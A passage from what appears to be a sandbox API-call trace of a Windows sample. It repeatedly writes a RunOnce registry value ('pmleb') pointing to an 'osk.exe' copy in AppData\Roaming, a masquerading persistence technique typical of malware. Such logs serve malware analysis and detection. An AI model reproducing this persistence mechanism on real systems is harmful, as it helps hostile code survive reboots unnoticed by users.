This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.597] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.597] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.597] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.597] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.597] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.597] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.597] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.597] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.597] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5 [0080.597] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.597] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6 [0080.597] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.598] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5 [0080.598] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.598] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.599] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.599] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.599] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.599] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.599] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.599] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.599] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.599] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.599] RegCloseKey (hKey=0x280) returned 0x0 [0080.600] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.600] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.600] SetTimer (hWnd=0x20280, nIDEvent=0x2081, uElapse=0xa, lpTimerFunc=0x0) returned 0x2081 [0080.600] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.611] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.611] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.611] KillTimer (hWnd=0x20280, uIDEvent=0x2081) returned 1 [0080.611] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.611] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.611] IUnknown:Release (This=0x787518) returned 0x1 [0080.612] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.612] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.612] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.612] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.612] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.612] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.612] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.612] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.612] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.612] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6 [0080.612] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.612] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7 [0080.612] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.613] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6 [0080.613] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.613] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.613] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.613] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.614] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.614] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.614] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.614] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.614] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.614] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.614] RegCloseKey (hKey=0x280) returned 0x0 [0080.614] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.614] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.615] SetTimer (hWnd=0x20280, nIDEvent=0x2082, uElapse=0xa, lpTimerFunc=0x0) returned 0x2082 [0080.615] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.626] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.626] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.626] KillTimer (hWnd=0x20280, uIDEvent=0x2082) returned 1 [0080.627] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.627] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.627] IUnknown:Release (This=0x787518) returned 0x1 [0080.627] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.627] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.627] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.627] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.628] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.628] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.628] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.628] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.628] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.628] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7 [0080.628] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.628] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x8 [0080.628] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.629] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7 [0080.629] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.629] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.629] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.629] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.629] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.629] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.629] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.629] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.630] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.630] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.630] RegCloseKey (hKey=0x280) returned 0x0 [0080.630] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.630] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.630] SetTimer (hWnd=0x20280, nIDEvent=0x2083, uElapse=0xa, lpTimerFunc=0x0) returned 0x2083 [0080.630] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.652] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.652] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.652] KillTimer (hWnd=0x20280, 